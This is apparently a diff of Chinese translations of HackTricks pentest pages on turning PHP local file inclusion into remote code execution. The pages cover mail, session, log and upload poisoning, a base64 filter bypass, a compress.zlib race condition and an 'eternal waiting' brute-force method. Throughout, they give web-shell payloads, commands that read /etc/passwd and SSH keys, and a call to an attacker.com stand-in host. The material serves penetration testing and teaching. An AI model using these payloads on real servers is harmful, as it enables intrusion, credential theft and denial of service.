**发送一封邮件**到内部账户 (user@localhost) 包含你的 PHP payload例如 `<?php echo system($_REQUEST["cmd"]); ?>`,并尝试通过路径如 **`/var/mail/<USERNAME>`** 或 **`/var/spool/mail/<USERNAME>`** 包含到用户的邮件中
**发送邮件**到内部账户 (user@localhost),包含你的 PHP 负载,如 `<?php echo system($_REQUEST["cmd"]); ?>`,并尝试包含用户的邮件,路径如 **`/var/mail/<USERNAME>`** 或 **`/var/spool/mail/<USERNAME>`**
### 通过 /proc/\*/fd/\*
1. 上传大量的 shells (例如100)
2. 包含 [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD),其中 $PID = 进程的 PID (可以暴力破解)$FD 是文件描述符 (也可以暴力破解)
1. 上传大量 shell例如100
2. 包含 [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD),其中 $PID = 进程的 PID(可以暴力破解),$FD 是文件描述符(也可以暴力破解)
### 通过 /proc/self/environ
一个日志文件一样,在 User-Agent 中发送 payload它将被反射到 /proc/self/environ 文件中
日志文件一样,在 User-Agent 中发送负载,它将反映在 /proc/self/environ 文件中
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
### 通过上传
如果您可以上传文件,只需在其中注入shell payload例如`<?php system($_GET['c']); ?>`
如果您可以上传文件,只需在其中注入 shell 负载 (例如:`<?php system($_GET['c']); ?>`)
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
为了保持文件的可读性,最好将恶意代码注入到图片/文档/PDF的元数据中
为了保持文件可读,最好将其注入到图片/doc/pdf 的元数据中。
### 通过上传 Zip 文件
### 通过 ZIP 文件上传
上传一个包含 PHP 木马的 ZIP 文件并进行压缩,然后访问:
上传一个包含压缩 PHP shell 的 ZIP 文件并访问:
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### 通过 PHP 会话
检查网站是否使用 PHP 会话PHPSESSID
检查网站是否使用 PHP 会话 (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
PHP中这些会话被存储在`/var/lib/php5/sess\[PHPSESSID]`文件中。
PHP 中,这些会话存储在 _/var/lib/php5/sess\\_\[PHPSESSID]\_ 文件中
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
将cookie设置为`<?php system('cat /etc/passwd');?>`
cookie 设置为 `<?php system('cat /etc/passwd');?>`
```
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```
使用LFI包含PHP会话文件
使用 LFI 包含 PHP 会话文件
```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
```
### 通过 ssh
如果 ssh 处于活动状态,请检查正在使用哪个用户(/proc/self/status 和 /etc/passwd然后尝试访问 **\<HOME>/.ssh/id\_rsa**
如果 ssh 处于活动状态,请检查正在使用的用户(/proc/self/status & /etc/passwd尝试访问 **\<HOME>/.ssh/id\_rsa**
### 通过 vsftpd 日志
### **通过** **vsftpd** _**日志**_
FTP 服务器 vsftpd 的日志位于 _**/var/log/vsftpd.log**_。在存在本地文件包含LFI漏洞且可以访问暴露的 vsftpd 服务器的情况下,可以考虑以下步骤:
FTP 服务器 vsftpd 的日志位于 _**/var/log/vsftpd.log**_。在存在本地文件包含LFI漏洞的情况下,并且可以访问暴露的 vsftpd 服务器,可以考虑以下步骤:
1. 在登录过程中的用户名字段中注入 PHP 负载
1. 在登录过程中将 PHP 有效负载注入到用户名字段中
2. 注入后,利用 LFI 从 _**/var/log/vsftpd.log**_ 检索服务器日志。
### 通过 php base64 过滤器(使用 base64
如 [](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) 文章所示PHP base64 过滤器会忽略非 base64。您可以利用这一点绕过文件扩展名检查如果提供以 ".php" 结尾的 base64它会忽略 "." 并将 "php" 附加到 base64。以下是一个示例负载
正如 [这篇](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) 文章所示PHP base64 过滤器会忽略非 base64。您可以利用这一点绕过文件扩展名检查如果提供以 ".php" 结尾的 base64会忽略 "." 并将 "php" 附加到 base64。以下是一个有效负载示例
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### 通过php过滤器无需文件
### 通过 php 过滤器(无需文件)
篇[**writeup**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)解释了您可以使用**php过滤器生成任意内容**作为输出。这基本上意味着您可以**生成任意的php代码**以供包含,**而无需将其写入**文件中
个 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了你可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着你可以 **生成任意的 php 代码** 进行包含 **而无需将其写入** 文件
{% content-ref url="lfi2rce-via-php-filters.md" %}
[lfi2rce-via-php-filters.md](lfi2rce-via-php-filters.md)
{% endcontent-ref %}
### 通过段错误
### 通过段错误
**上传**一个将被存储为**临时文件**在`/tmp`中,然后在**同一请求中**触发一个**分段错误**,那么**临时文件将不会被删除**,您可以搜索到它。
**上传** 一个将存储为 **临时** 的文件到 `/tmp`,然后在 **同一请求中** 触发 **段错误**,然后 **临时文件将不会被删除**,你可以搜索它。
{% content-ref url="lfi2rce-via-segmentation-fault.md" %}
[lfi2rce-via-segmentation-fault.md](lfi2rce-via-segmentation-fault.md)
{% endcontent-ref %}
### 通过Nginx临时文件存储
### 通过 Nginx 临时文件存储
如果您发现了一个**本地文件包含**漏洞,且**Nginx**在PHP前面运行您可能可以使用以下技术获得RCE
如果你发现了 **本地文件包含** 并且 **Nginx** 在 PHP 前面运行,你可能能够通过以下技术获得 RCE
{% content-ref url="lfi2rce-via-nginx-temp-files.md" %}
[lfi2rce-via-nginx-temp-files.md](lfi2rce-via-nginx-temp-files.md)
{% endcontent-ref %}
### 通过PHP\_SESSION\_UPLOAD\_PROGRESS
### 通过 PHP_SESSION_UPLOAD_PROGRESS
如果您发现了一个**本地文件包含**漏洞,即使您**没有会话**且`session.auto_start`为`Off`。如果您在**多部分POST**数据中提供**`PHP_SESSION_UPLOAD_PROGRESS`**PHP将**为您启用会话**。您可以滥用此功能来获得RCE
如果你发现了 **本地文件包含** 即使你 **没有会话** 并且 `session.auto_start``Off`。如果你在 **multipart POST** 数据中提供 **`PHP_SESSION_UPLOAD_PROGRESS`**PHP 将 **为你启用会话**。你可以利用这一点获得 RCE
{% content-ref url="via-php_session_upload_progress.md" %}
[via-php\_session\_upload\_progress.md](via-php\_session\_upload\_progress.md)
{% endcontent-ref %}
### 通过Windows中的临时文件上传
### 通过 Windows 中的临时文件上传
如果您发现了一个**本地文件包含**漏洞,且服务器在**Windows**上运行,您可能会获得RCE
如果你发现了 **本地文件包含** 并且服务器在 **Windows** 中运行,你可能会获得 RCE
{% content-ref url="lfi2rce-via-temp-file-uploads.md" %}
[lfi2rce-via-temp-file-uploads.md](lfi2rce-via-temp-file-uploads.md)
{% endcontent-ref %}
### 通过phpinfo()file\_uploads = on
### 通过 phpinfo()file_uploads = on
如果您发现了一个**本地文件包含**漏洞,并且一个暴露**phpinfo()**的文件中file\_uploads = on您可以获得RCE
如果你发现了 **本地文件包含** 并且一个文件暴露了 **phpinfo()** 且 file_uploads = on你可以获得 RCE
{% content-ref url="lfi2rce-via-phpinfo.md" %}
[lfi2rce-via-phpinfo.md](lfi2rce-via-phpinfo.md)
{% endcontent-ref %}
### 通过compress.zlib + `PHP_STREAM_PREFER_STUDIO` + 路径泄露
### 通过 compress.zlib + `PHP_STREAM_PREFER_STUDIO` + 路径泄露
如果您发现了一个**本地文件包含**漏洞,且您**可以泄露临时文件的路径**,但**服务器**正在**检查**要包含的文件是否具有PHP标记您可以尝试使用这个**竞争条件**来**绕过该检查**
如果你发现了 **本地文件包含** 并且你 **可以提取临时文件的路径****服务器** 正在 **检查** 要包含的 **文件是否有 PHP 标记**,你可以尝试通过这个 **竞争条件****绕过该检查**
{% content-ref url="lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md" %}
[lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md](lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
{% endcontent-ref %}
### 通过永等待 + 暴力破解
### 通过永等待 + 暴力破解
如果您可以滥用LFI来**上传临时文件**并使服务器**挂起**PHP执行然后您可以**在数小时内暴力破解文件名**以找到临时文件:
如果你可以利用 LFI **上传临时文件** 并使服务器 **挂起** PHP 执行,你可以 **在数小时内暴力破解文件名** 以找到临时文件:
{% content-ref url="lfi2rce-via-eternal-waiting.md" %}
[lfi2rce-via-eternal-waiting.md](lfi2rce-via-eternal-waiting.md)
{% endcontent-ref %}
### 致命错误
### 致命错误
如果您包含任何文件`/usr/bin/phar`、`/usr/bin/phar7`、`/usr/bin/phar.phar7`、`/usr/bin/phar.phar`。(您需要两次包含相同的文件以引发该错误)。
如果你包含任何文件 `/usr/bin/phar`、`/usr/bin/phar7`、`/usr/bin/phar.phar7`、`/usr/bin/phar.phar`。(你需要包含同一个文件两次以引发该错误)。
**我不知道这有什么用,但可能有用。**\
_即使引发PHP致命错误PHP上传的临时文件也会被删除。_
_即使你导致 PHP 致命错误,上传的 PHP 临时文件也会被删除。_
<figure><img src="../../.gitbook/assets/image (1031).png" alt=""><figcaption></figcaption></figure>
## 参考
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)\\
* [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激和挑战的内容
**实时黑客新闻**\
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
及时了解最新的漏洞赏金发布和重要平台更新
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# LFI2RCE 通过 compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + 路径泄露
# LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
#### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,15 +31,15 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫
### `compress.zlib://``PHP_STREAM_PREFER_STDIO`
使用协议 `compress.zlib://` 和标志 `PHP_STREAM_PREFER_STDIO` 打开的文件可以继续将到达连接的数据写入同一文件。
使用协议 `compress.zlib://` 和标志 `PHP_STREAM_PREFER_STDIO` 打开的文件可以继续将稍后到达连接的数据写入同一文件。
这意味着可以进行如下调用:
这意味着像这样的调用:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
将发送一个请求请求http://attacker.com/file然后服务器可能会用一个有效的HTTP响应来回应该请求保持连接打开并在稍后发送额外数据这些数据也会被写入文件。
将发送请求,询问 http://attacker.com/file然后服务器可能会用有效的 HTTP 响应来响应请求,保持连接打开,并在稍后发送额外的数据,这些数据也将被写入文件。
您可以在php-src代码中的main/streams/cast.c部分看到这些信息:
您可以在 php-src 代码的 main/streams/cast.c 中看到该信息:
```c
/* Use a tmpfile and copy the old streams contents into it */
@ -48,42 +49,43 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_temp_new();
}
```
### Race Condition to RCE
### 竞争条件到 RCE
[**这个CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) 是使用之前的技巧解决的。
[**这个 CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) 是通过之前的技巧解决的。
攻击者将使**受害者服务器打开一个连接,从攻击者服务器读取文件**,使用**`compress.zlib`**协议。
攻击者将使 **受害者服务器打开一个连接,从攻击者服务器读取文件**,使用 **`compress.zlib`** 协议。
**在**这个**连接**存在的时候,攻击者将**窃取临时文件的路径**被服务器泄露)。
**在** 这个 **连接** 存在时,攻击者将 **提取临时文件的路径**(它被服务器泄露)。
**在**连接**仍然打开**的情况下,攻击者将**利用LFI加载他控制的临时文件**
**在** 这个 **连接** 仍然打开时,攻击者将 **利用 LFI 加载他控制的临时文件**
然而,Web服务器中有一个检查**阻止加载包含 `<?`** 的文件。因此,攻击者将滥用**竞争条件**。在仍然打开的连接中,**攻击者**将在**Web服务器**检查文件是否包含被禁止字符之后**发送PHP有效载荷**,但在**加载其内容之前**
然而,web 服务器中有一个检查,**防止加载包含 `<?`** 的文件。因此,攻击者将利用 **竞争条件**。在仍然打开的连接中,**攻击者** 将 **在** **web 服务器** **检查** 文件是否包含禁止字符 **之后** 发送 PHP 负载,但 **在** 它加载内容 **之前**
有关更多信息,请查看[https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)中的竞争条件和CTF的描述。
有关更多信息,请查看竞争条件和 CTF 的描述 [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
#### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个以**暗网**为基础的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**
[**WhiteIntel**](https://whiteintel.io) 是一个 **暗网** 驱动的搜索引擎,提供 **免费** 功能,以检查公司或其客户是否被 **窃取恶意软件** **攻击**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,102 +1,125 @@
# 通过永久等待实现LFI2RCE
# LFI2RCE via Eternal waiting
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 基本信息
默认情况下,当将文件上传到PHP时即使PHP不期望它会在`/tmp`目录中生成一个临时文件,文件名类似于**`php[a-zA-Z0-9]{6}`**尽管我看到一些Docker镜像生成的文件不包含数字。
默认情况下,当文件被上传到PHP时即使它不期望这样它将在`/tmp`中生成一个临时文件,名称类似于**`php[a-zA-Z0-9]{6}`**尽管我见过一些docker镜像生成的文件不包含数字。
在本地文件包含中,**如果您成功包含了上传的文件,您将获得RCE**。
在本地文件包含中,**如果你设法包含那个上传的文件,你将获得RCE**。
请注意,默认情况下**PHP仅允许在单个请求中上传20个文件**(设置在`/etc/php/<version>/apache2/php.ini`中):
请注意,默认情况下**PHP只允许在单个请求中上传20个文件**在`/etc/php/<version>/apache2/php.ini`中设置
```
; Maximum number of files that can be uploaded via a single request
max_file_uploads = 20
```
也就是说,**潜在文件名的数量为 62\*62\*62\*62\*62\*62 = 56800235584**
### 其他技术
其他技术依赖于攻击 PHP 协议(如果您只控制路径的最后部分,则无法进行攻击)、披露文件路径、滥用预期文件,或**使 PHP 遭受分段故障,以便上传的临时文件不会被删除**。\
这种技术**与最后一种非常相似,但不需要找到零日漏洞**。
### 永久等待技术
在这种技术中,**我们只需要控制一个相对路径**。如果我们设法上传文件并使**LFI永不结束**,我们将有"足够的时间"来**暴力破解上传的文件**并**找到**其中任何一个。
在这种技术中,**我们只需要控制一个相对路径**。如果我们设法上传文件并使**LFI 永不结束**,我们将有“足够的时间”来**暴力破解上传的文件**并**找到**任何已上传的文件
**这种技术的优点**
- 您只需要控制包含文件中的相对路径
- 不需要nginx或意外级别的访问日志文件
- 不需要0天来导致分段错误
- 不需要路径泄
* 您只需控制包含中的相对路径
* 不需要 nginx 或意外的日志文件访问级别
* 不需要零日漏洞来导致分段故障
* 不需要路径披
这种技术的**主要问题**包括
这种技术的**主要问题**
- 需要特定文件存在(可能有更多)
- **潜在文件名的数量巨大****56800235584**
- 如果服务器**不使用数字**,则总潜在数量为:**19770609664**
- 默认情况下,**每个请求只能上传20个文件**。
- 所使用服务器的**最大并行工作者数**。
- 这个限制与之前的限制可能导致攻击持续时间过长
- **PHP请求的超时**。理想情况下这应该是永久的或者应该在不删除临时上传文件的情况下终止PHP进程否则这也将是一个问题
* 需要特定的文件存在(可能还有更多)
* **潜在文件名的数量惊人****56800235584**
* 如果服务器**不使用数字**,则总潜在数量为:**19770609664**
* 默认情况下,**每个请求只能上传 20 个文件**。
* 使用的服务器的**最大并行工作者数量**。
* 这个限制与之前的限制可能会使攻击持续太久
* **PHP 请求的超时**。理想情况下,这应该是永恒的,或者应该在不删除临时上传文件的情况下终止 PHP 进程,否则这也会很麻烦
那么,您如何**使PHP包含永不结束**?只需包含文件**`/sys/kernel/security/apparmor/revision`****不幸的是,在Docker容器中不可用**)。
那么,您如何**使 PHP 包含永不结束**?只需包含文件**`/sys/kernel/security/apparmor/revision`****在 Docker 容器中不可用**,不幸的是...)。
尝试调用它
只需调用
```bash
php -a # open php cli
include("/sys/kernel/security/apparmor/revision");
```
## Apache2
默认情况下Apache 支持 **150 个并发连接**,根据 [https://ubiq.co/tech-blog/increase-max-connections-apache/](https://ubiq.co/tech-blog/increase-max-connections-apache/) 可以将此数字提升至 8000。按照以下步骤使用 PHP 与该模块:[https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04)。
默认情况下Apache 支持 **150 个并发连接**,根据 [https://ubiq.co/tech-blog/increase-max-connections-apache/](https://ubiq.co/tech-blog/increase-max-connections-apache/) 的信息,可以将这个数字提升到 **8000**。按照这个链接使用 PHP 和该模块:[https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04)。
默认情况下(根据我的测试),**PHP 进程可以永久存在**。
默认情况下,(根据我的测试)**PHP 进程可以永远存在**。
我们做一些数学计算:
我们做一些数学计算:
* 我们可以使用 **149 个连接** 生成 **149 \* 20 = 2980 个临时文件**与我们的 Webshell。
* 我们可以使用 **149 个连接** 来生成 **149 \* 20 = 2980 个临时文件**,通过我们的 webshell。
* 然后,使用 **最后一个连接****暴力破解** 潜在文件。
* 以 **10 请求/秒** 的速度计算,时间为:
* 56800235584 / 2980 / 10 / 3600 \~= **530 小时**50% 的概率在 265 小时内
* 去掉小数19770609664 / 2980 / 10 / 3600 \~= 185 小时50% 的概率在 93 小时内
* 以 **10 请求/秒** 的速度,所需时间为:
* 56800235584 / 2980 / 10 / 3600 \~= **530 小时**265 小时有 50% 的机会
* 不带数字19770609664 / 2980 / 10 / 3600 \~= 185 小时93 小时有 50% 的机会
{% hint style="warning" %}
请注意,在上述示例中,我们正在 **完全 DoS 其他客户端**
请注意,在前面的例子中,我们是 **完全对其他客户端进行 DoS 攻击**
{% endhint %}
如果 Apache 服务器得到改进,我们可以滥用 **4000 个连接**接近最大数量的一半)。我们可以创建 `3999*20 = 79980` **文件**,这将使时间缩短至约 **19.7 小时****6.9 小时**10 小时3.5 小时 50% 的概率)。
如果 Apache 服务器得到改进,我们可以滥用 **4000 个连接**达到最大数量的一半)。我们可以创建 `3999*20 = 79980` **个文件**,并且 **数量****减少** 到大约 **19.7 小时****6.9 小时**10 小时3.5 小时有 50% 的机会)。
## PHP-FMP
如果网页使用 **PHP-FMP** 而不是常规的 PHP 模块来运行 PHP 脚本(这可以提高网页的效率,因此很常见),那么有一些其他方法可以改进技术。
如果网页使用的是 **PHP-FMP** 而不是常规的 php mod 来运行 PHP 脚本(这提高了网页的效率,因此很常见),那么还有其他方法可以改进该技术。
PHP-FMP 允许在 **`/etc/php/<php-version>/fpm/pool.d/www.conf`** 中配置参数 **`request_terminate_timeout`**。\
此参数指示 PHP 请求必须在多少秒内终止(默认情况下为无限,但如果取消注释,则为 **30 秒**)。当 PHP 处理请求达到指定的秒数时,请求将被 **终止**。这意味着,如果请求正在处理中,由于 **PHP 处理被停止**,这些 **文件不会被删除**。因此,如果您可以使请求持续那么长时间,您可以 **生成成千上万个临时文件**,这些文件不会被删除,这将 **加快查找文件的过程**,减少通过消耗所有连接来对平台进行 DoS 的概率
PHP-FMP 允许在 **`/etc/php/<php-version>/fpm/pool.d/www.conf`** 中 **配置** **参数** **`request_terminate_timeout`**。\
该参数指示 **请求 PHP 时必须终止的最大秒数**(默认无限,但 **如果参数未注释则为 30 秒**)。当 PHP 正在处理请求时,达到指定的秒数后,它会被 **终止**。这意味着,如果请求正在上传临时文件,因为 **PHP 处理被停止**,那些 **文件将不会被删除**。因此,如果你能让请求持续那么长时间,你可以 **生成成千上万的临时文件**,这些文件不会被删除,这将 **加快查找它们的过程**,并减少通过消耗所有连接对平台造成 DoS 的可能性
因此,为了 **避免 DoS**,假设攻击者一次只使用 **100 个连接**,并且由 **php-fmp** 控制的 PHP 最大处理时间(`request_terminate_timeout`)为 **30 秒**。因此,攻击者每秒可以生成的 **临时文件** 为 `100*20/30 = 66.67`
